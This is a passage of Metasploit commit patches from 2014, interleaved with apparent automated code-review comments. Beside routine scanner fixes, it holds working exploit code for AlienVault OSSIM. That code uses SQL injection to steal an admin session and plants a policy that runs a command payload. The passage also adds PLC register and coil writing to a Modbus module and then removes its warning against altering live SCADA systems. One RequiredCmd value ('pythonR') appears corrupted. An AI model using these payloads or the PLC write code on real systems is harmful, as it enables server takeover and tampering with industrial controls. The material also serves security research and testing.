Array.new + host_port.each do |key, value| + backends.push key + end + report_note( + :host => datastore['RHOST'], + :type => "F5_Cookie_Backends", + :data => backends + ) end end From 6610977e86878b324df92fc7cf4686cc7ccef9ea Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:39:32 +0200 Subject: [PATCH 174/853] add cookie.match and alway return --- modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) 
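Review bot: Inside the retry loop of `run`, the result of `get_cookie()` is passed straight to `cookie_decode(value)` without the `id` check that the first call now gets. `get_cookie` returns nil for both values when a reply carries no matching cookie, so a single cookie-less response after the first one reaches `cookie_decode` with nil (that method is outside the hunk, so its nil handling is not visible). The loop condition `until i == datastore['RETRY']` also never becomes true when RETRY is 0 or negative, since `i` starts at 1 and only grows. Something like `(datastore['RETRY'].to_i - 1).times do` with `next unless id` after the `get_cookie()` call covers both cases. `run` begins just above the hunk.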
diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 60d811b3b3..c5bcbe59f9 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -52,13 +52,14 @@ class Metasploit3 < Msf::Auxiliary 'uri' => @uri }) + id,value = nil begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" - m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] - return id, value + return id, value end end From f34cfefb8f0aab9a2ff6df558cc277a793a8e459 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:52:46 +0200 Subject: [PATCH 175/853] Change hash to array --- .../scanner/http/f5_bigip_cookie_disclosure.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index c5bcbe59f9..73d89164c2 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end def run - host_port = Hash.new + host_port = Array.new @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") id, value = get_cookie() 
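Review bot: In `get_cookie` (hunk `@@ -52,13 +52,14 @@`), the `return id, value` inside `ensure` discards any exception raised in the `begin` body. A nil `res` or any other fault in the request path therefore ends as a silent pair of nils, indistinguishable from "no F5 cookie present". An explicit check reads more clearly and lets unexpected errors surface: `return nil, nil unless res` before the match and `m ? [m[1], m[2]] : [nil, nil]` as the method's value, with no `begin`/`ensure`. The added `id,value = nil` is overwritten in `ensure` on every path and can go. The method's `def` line is outside the hunk.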
@@ -74,22 +74,22 @@ class Metasploit3 < Msf::Auxiliary end print_status ("F5 cookie \"#{id}\" found") host, port = cookie_decode(value) - host_port[host+":"+port] = true + host_port.push(host+":"+port) print_status "Backend #{host}:#{port}" i=1 # We already have done one request until i == datastore['RETRY'] id, value = get_cookie() host, port = cookie_decode(value) - if ! host_port.has_key? host+":"+port - host_port[host+":"+port] = true + unless host_port.include? (host+":"+port) + host_port.push(host+":"+port) print_status "Backend #{host}:#{port}" end i += 1 end # Reporting found backend in database backends = Array.new - host_port.each do |key, value| - backends.push key + host_port.each do |key| + backends.push (key) end report_note( :host => datastore['RHOST'], From 3bfa8ea707273248a5168a9dba51d95c81de2fca Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:53:49 +0200 Subject: [PATCH 176/853] Pass msftidy --- modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 73d89164c2..a174f77928 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -51,7 +51,6 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => @uri }) - id,value = nil begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" From 2396d497d8d3190bd0057f946b1378309673bb88 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:57:54 +0200 Subject: [PATCH 177/853] move scanner to gather --- .../{scanner/http => gather}/f5_bigip_cookie_disclosure.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{scanner/http => gather}/f5_bigip_cookie_disclosure.rb (100%) 
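Review bot: Now that `host_port` is an Array, the `backends` loop at the end of the `@@ -74,22 +74,22 @@` hunk copies the same list element by element; passing `:data => host_port` to `report_note` says the same with less code. `host_port.include? (host+":"+port)` and `backends.push (key)` put a space before the argument parenthesis, which Ruby can warn about under `-w`; `host_port.include?("#{host}:#{port}")` avoids that and the repeated string concatenation.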
diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb similarity index 100% rename from modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb rename to modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb From fb39e422aa52f4e41b7258d7432341cbe34b4c7e Mon Sep 17 00:00:00 2001 From: Zinterax Date: Mon, 28 Apr 2014 09:28:29 -0400 Subject: [PATCH 178/853] Fix smb_login calling nonexistent method When a Rex::Proto::SMB::Exceptions::InvalidWordCount exception is thrown by this module, it attempts to call the nonexistent method error_reason and throws a NoMethodError: Auxiliary failed: NoMethodError undefined method `error_reason' for # This changes uses the built in method get_error to return an error code. [-] x.x.x.x:445 SMB - [1/1] - \\Domain - FAILED LOGIN (xxxxxxxx) xxxx : xxxxx [STATUS_WAIT_0] --- modules/auxiliary/scanner/smb/smb_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0d7daddb69..33a34b629e 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::Proto::SMB::Exceptions::LoginError => e status_code = e.error_reason rescue ::Rex::Proto::SMB::Exceptions::InvalidWordCount => e - status_code = e.error_reason + status_code = e.get_error(e.error_code) rescue ::Rex::Proto::SMB::Exceptions::NoReply ensure disconnect() From a2ccbf9833e8ffebfac80e133f31089bdd740c32 Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Mon, 28 Apr 2014 15:29:55 +0200 Subject: [PATCH 179/853] Add read/write capabilities to modbusclient --- .../auxiliary/scanner/scada/modbusclient.rb | 187 ++++++++++++------ 1 file changed, 132 insertions(+), 55 deletions(-) 
diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index bd4f6ab6fe..64293b63ee 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb 
@@ -8,74 +8,151 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Fuzzer + include Rex::Socket::Tcp def initialize(info = {}) super(update_info(info, - 'Name' => 'Modbus Client Utility', - 'Description' => %q{ - This module sends a command (0x06, write to one register) to a Modbus endpoint. - You can change port, IP, register to write and data to write, as well as unit-id. + 'Name' => 'Modbus client, reloaded.', + 'Description' => %q{ + This module allows reading and writing data to a PLC using the Modbus protocol. - Modbus is a clear text protocol used in common SCADA systems, developed - originally as a serial-line (RS232) async protocol. It is later transformed - to IP, which is called ModbusTCP. - - There are a handful of functions which are possible to do, but this - client has only implemented the function "write value to register" (\x48). + This module is based on the 'modiconstop.rb' Basecamp module from + DigitalBond, as well as the mbtget perl script. 
}, - 'Author' => [ 'EsMnemon ' ], - 'References' => + 'Author' => [ - ['URL', 'http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx'] + 'EsMnemon ', # original write-only module + 'Arnaud SOULLIE ', # new code that allows read/write ], 'License' => MSF_LICENSE, - 'DisclosureDate' => 'Nov 1 2011' - )) + )) + register_options( + [ + OptEnum.new("MODE", [true, 'Command', "READ_REGISTER", + [ + "READ_REGISTER", + "READ_COIL", + "WRITE_REGISTER", + "WRITE_COIL" + ] + ]), + Opt::RPORT(502), + OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)", 0xBEEF]), + OptInt.new('DATA_ADDRESS', [true, "Modbus data address", 0]), + OptInt.new('UNIT_NUMBER', [false, "Modbus unit number (255 if not used)", 255]), + ], self.class) - register_options([ - Opt::RPORT(502), - OptInt.new('UNIT_ID', [true, "ModBus Unit Identifier ", 1]), - OptInt.new('MODVALUE', [true, "ModBus value to write (data) ", 2]), - OptInt.new('REGIS', [true, "ModBus Register definition", 1002]) - ], self.class) + end + + # Don't mess with live production SCADA systems + def scada_write_warning + print_status("Warning : do not try to alter live SCADA configuration. Bad shit can happened. Continue ? 
(y/n)") + go_on = gets + unless go_on.chomp == 'y' + print_error("Stopping module") + exit + end + end + + # a wrapper just to be sure we increment the counter + def sendframe(payload) + sock.put(payload) + @modbuscounter += 1 + r = sock.recv(65535, 0.1) + return r + end + + def make_read_payload + payload = "" + payload += [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [1].pack("n") + + packetdata = "" + packetdata += [@modbuscounter].pack("n") + packetdata += "\x00\x00\x00" #dunno what these are + packetdata += [payload.size].pack("c") # size byte + packetdata += payload + + return packetdata + end + + def make_write_coil_payload(data) + payload = "" + payload += [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [data].pack("c") + payload += "\x00" + + packetdata = "" + packetdata += [@modbuscounter].pack("n") + packetdata += "\x00\x00\x00" #dunno what these are + packetdata += [payload.size].pack("c") # size byte + packetdata += payload + + return packetdata + end + + def make_write_register_payload(data) + payload = "" + payload += [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [data].pack("n") + + packetdata = "" + packetdata += [@modbuscounter].pack("n") + packetdata += "\x00\x00\x00" #dunno what these are + packetdata += [payload.size].pack("c") # size byte + packetdata += payload + + return packetdata end def run - trans_id ="\x21\x00" - proto_id ="\x00\x00" - len ="\x00\x06" - func_id ="\x06" + @modbuscounter = 0x0000 # used for modbus frames + connect + case datastore['MODE'] + when "READ_COIL" + @function_code = 1 + response = sendframe(make_read_payload) + print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', 
'').gsub(']', '')) - #For debug: MODVALUE=19276 REGIS=18762, UNIT_ID=71 - #trans_id="\x41\x42" - #proto_id="\x43\x44" - #len="\x45\x46" - #func_id="\x48" + when "READ_REGISTER" + @function_code = 3 + response = sendframe(make_read_payload) + value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') + print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) - sploit = trans_id - sploit += proto_id - sploit += len - sploit += [datastore['UNIT_ID']].pack("C") - sploit += func_id - sploit += [datastore['REGIS']].pack("S").reverse - sploit += [datastore['MODVALUE']].pack("S").reverse + when "WRITE_COIL" + scada_write_warning + @function_code = 5 + if datastore['DATA'] == 0 + data = 0 + elsif datastore['DATA'] == 1 + data = 255 + else + print_error("Data value must be 0 or 1 in WRITE_COIL mode") + exit + end + response = sendframe(make_write_coil_payload(data)) + print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") - connect() - sock.put(sploit) - sock.get_once - disconnect() + when "WRITE_REGISTER" + scada_write_warning + @function_code = 6 + if datastore['DATA'] < 0 || datastore['DATA'] > 65535 + print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") + exit + end + response = sendframe(make_write_register_payload(datastore['DATA'])) + print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") + + else + print_error("Invalid MODE") + return + end end -end - - -=begin -MODBUS: 10 00 00 00 00 06 01 06 03 ea 00 02 -tested on a SAIA PCD1.M2 -scapy - even with source-IP - sploit="\x21\x00\x00\x00\x00\x06\x01\x06\x03\xea\x00\x02" - ip=IP(dst="172.16.10.10",src="172.16.10.155",proto=6,flags=2) - tcp=TCP(dport=509) - send(ip/tcp/sploit) - -=end +end \ No newline at end of file From ab913a533e512b8b247cc4f422e8c06734ef0df7 Mon Sep 17 00:00:00 2001 
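Review bot: Both write branches of `run` print "successfully written" without looking at `response`, so a Modbus exception reply, a short read or a nil from `sock.recv` is reported as success. The function code echoed in the reply should be compared with `@function_code` before `print_good`. In READ_REGISTER, `response.split[0][9..10]` should become `response[9..10]`, because `split` cuts binary data at any whitespace byte. The `exit` calls in `scada_write_warning` and in the two validation branches end the whole Ruby process rather than the module run; `return` is enough. `connect` has no matching `disconnect`, which the replaced code did call after `sock.get_once`.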
From: Pedro Laguna Date: Mon, 28 Apr 2014 14:36:48 +0100 Subject: [PATCH 180/853] Update oracle_demantra_file_retrieval.rb Fixed typo --- .../auxiliary/scanner/http/oracle_demantra_file_retrieval.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index 6a71e8a8ea..0883e3e6e5 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass', 'Description' => %q{ - This module exploits a file downlad vulnerability found in Oracle + This module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By combining these exposures, an unauthenticated user can retreive any file on the system by referencing the full file path to any file a vulnerable From a0add34a7d961b5ff6438e9b0f7bfd363927ed0b Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Mon, 28 Apr 2014 15:47:10 +0200 Subject: [PATCH 181/853] Removed warning message and changed default unit number to 1 --- modules/auxiliary/scanner/scada/modbusclient.rb | 14 +------------- 1 file changed, 1 insertion(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 64293b63ee..e5b2bf0f2d 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb 
@@ -39,21 +39,11 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(502), OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)", 0xBEEF]), OptInt.new('DATA_ADDRESS', [true, "Modbus data address", 0]), - OptInt.new('UNIT_NUMBER', [false, "Modbus unit number (255 if not used)", 255]), + OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]), ], self.class) end - # Don't mess with live production SCADA systems - def scada_write_warning - print_status("Warning : do not try to alter live SCADA configuration. Bad shit can happened. Continue ? (y/n)") - go_on = gets - unless go_on.chomp == 'y' - print_error("Stopping module") - exit - end - end - # a wrapper just to be sure we increment the counter def sendframe(payload) sock.put(payload) @@ -127,7 +117,6 @@ class Metasploit3 < Msf::Auxiliary print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) when "WRITE_COIL" - scada_write_warning @function_code = 5 if datastore['DATA'] == 0 data = 0 @@ -141,7 +130,6 @@ class Metasploit3 < Msf::Auxiliary print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") when "WRITE_REGISTER" - scada_write_warning @function_code = 6 if datastore['DATA'] < 0 || datastore['DATA'] > 65535 print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") From 245b59124727210386920bc3fecc40367e8db8d2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:45:40 -0500 Subject: [PATCH 182/853] Do module clean up --- .../unix/webapp/alienvault_sqli_exec.rb | 182 +++++++++--------- 1 file changed, 92 insertions(+), 90 deletions(-) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb index 8c7653c8a5..f3bfa8a513 100644 --- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb 
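Review bot: `UNIT_NUMBER` is still declared optional (`false`) in the `@@ -39,21 +39,11 @@` hunk, but every payload builder packs it unconditionally with `[datastore['UNIT_NUMBER']].pack("c")`. If an unset option comes back as nil, that would fail inside `pack` instead of producing a readable error. Since a default is supplied anyway, marking it required matches how the value is used: `OptInt.new('UNIT_NUMBER', [true, "Modbus unit number", 1]),`. The same applies to `DATA` in the write modes, where `datastore['DATA'] < 0` is evaluated without a nil check. The option list begins above the hunk.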
@@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + ['OSVDB', '106252'], + ['EDB', '33006'] ], 'DefaultOptions' => { 'SSL' => true }, - 'Platform' => ['unix'], + 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { @@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - ['Alienvault OSSIM', {}] + ['Alienvault OSSIM 4.3', {}] ], 'Privileged' => true, - 'DisclosureDate' => "Apr 28 2014", + 'DisclosureDate' => "Apr 24 2014", 'DefaultTarget' => 0)) register_options( @@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote def check - # Check version - vprint_status("#{peer} - Trying to detect vulnerable OSSIM") - marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" + sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 + if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root return Exploit::CheckCode::Vulnerable else + print_status("#{res.body}") return Exploit::CheckCode::Safe end 
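Review bot: In the `else` branch of `check` (third hunk), the added `print_status("#{res.body}")` dereferences `res` on a path where it may be nil, because the condition above is also false when no response came back. That would raise NoMethodError instead of returning a check code, and when a response does exist the whole page is printed at status level. A guarded, verbose-only line such as `vprint_status("#{peer} - Unexpected response (HTTP #{res.code})") if res` avoids both. The trailing comment `# 726F6F7440 = root` is off by one character, since that hex string decodes to `root@`.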
@@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" + sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" print_status("#{peer} - Trying to grab admin session through SQLi") @@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ - adminsession = $1 - @cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") + if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ + admin_session = $1 + @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") 
@@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end - # Retrieving the Action ID, used to clean up the action after succesful exploitation - post_vars = "page=1&rp=2000" + # Retrieving the Action ID, used to clean up the action after successful exploitation res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), 'cookie' => @cookie, - 'data' => post_vars + 'vars_post' => { + 'page' => '1', + 'rp' => '2000' + } }) - if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ - @actionid = $1 - print_status("#{peer} - Action ID is [ #{@actionid} ]") + if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ + @action_id = $1 + print_status("#{peer} - Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end @@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving the policy data, necessary for proper cleanup after succesful exploitation res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), + 'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"), 'cookie' => @cookie, 'vars_get' => { 'm_opt' => 'configuration', 
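Review bot: In the second hunk, `normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php")` is the only call among these hunks that adds `.to_s`; the other requests pass `target_uri.path` directly. One form should be used throughout, e.g. `normalize_uri(target_uri.path, "ossim", "policy", "policy.php")`. The comment at the top of the same hunk still reads "succesful", although that typo was corrected in the previous hunk. The enclosing `exploit` method starts and ends outside these hunks.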
@@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ - policyctx = $1 - policygroup = $2 - print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") + if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ + policy_ctx = $1 + policy_group = $2 + print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => { 'descr' => policy, 'active' => '1', - 'group' => policygroup, - 'ctx' => policyctx, + 'group' => policy_group, + 'ctx' => policy_ctx, 'order' => '1', # Makes this the first policy, overruling all the other policies 'action' => 'new', 'sources[]' => '00000000000000000000000000000000', # Source is ANY @@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote 'end_day_week' => '7', 'end_day_month' => '31', 'end_month' => '12', - 'actions[]' => @actionid, + 'actions[]' => @action_id, 'sim' => '1', 'priority' => '1', 'qualify' => '1', @@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") 
@@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), 'cookie' => @cookie, 'vars_get' => { - 'ctx' => policyctx, - 'group' => policygroup + 'ctx' => policy_ctx, + 'group' => policy_group }, 'vars_post' => { 'page' => '1', 'rp' => '2000' } }) - if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ - @policyid = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") + if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ + @policy_id = $1 + print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - policy = rand_text_alpha(8) print_status("#{peer} - Reloading Policies") res = send_request_cgi({ 'method' => 'GET', @@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") @@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dontexist = rand_text_alpha(8+rand(4)) + dont_exist = rand_text_alpha(8+rand(4)) print_status("#{peer} - Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dontexist), + 'uri' => normalize_uri(target_uri.path, dont_exist), 'cookie' => @cookie }) - if res and res.code == 404 + if res && res.code == 404 print_status("#{peer} - Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") 
@@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup - # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), - 'cookie' => @cookie, - 'vars_post' => { 'f_name' => 'delete_policy' } - }) + begin + # Clean up, retrieve token so that the policy can be removed + print_status("#{peer} - Cleaning up") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), + 'cookie' => @cookie, + 'vars_post' => { 'f_name' => 'delete_policy' } + }) - if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ - token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") - else - print_warning("#{peer} - Unable to retrieve token") + if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + print_warning("#{peer} - Unable to retrieve token") + end + + # Remove our policy + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'confirm' => 'yes', + 'id' => @policy_id, + 'token' => token + } + }) + + if res && res.code == 200 + print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + else + print_warning("#{peer} - Unable to remove Policy ID") + end + + # Remove our action + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'id' => @action_id, + } + }) + + if res && res.code == 200 + print_status("#{peer} - Action ID [ #{@action_id} ] removed") + else + print_warning("#{peer} - Unable to remove Action ID") + end + ensure + super # mixins should be able to 
cleanup even in case of Exception end - - # Remove our policy - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'confirm' => 'yes', - 'id' => @policyid, - 'token' => token - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] removed") - else - print_warning("#{peer} - Unable to remove Policy ID") - end - - # Remove our action - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'id' => @actionid, - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Action ID [ #{@actionid} ] removed") - else - print_warning("#{peer} - Unable to remove Action ID") - end - end end From 887dfc5f4028bc7c614e6c4ef12601ab641d9402 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:54:56 -0500 Subject: [PATCH 183/853] Fix RequiredCmd --- modules/exploits/unix/webapp/alienvault_sqli_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb index f3bfa8a513..43a4f1574e 100644 --- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Compat' => { - 'RequiredCmd' => 'generic perl ruby python bash', + 'RequiredCmd' => 'generic perl pythonR', } }, 'Targets' => From 51a5a901a8438ea209e8a391f2498c718676627c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:55:06 -0500 Subject: [PATCH 184/853] Fix typo --- 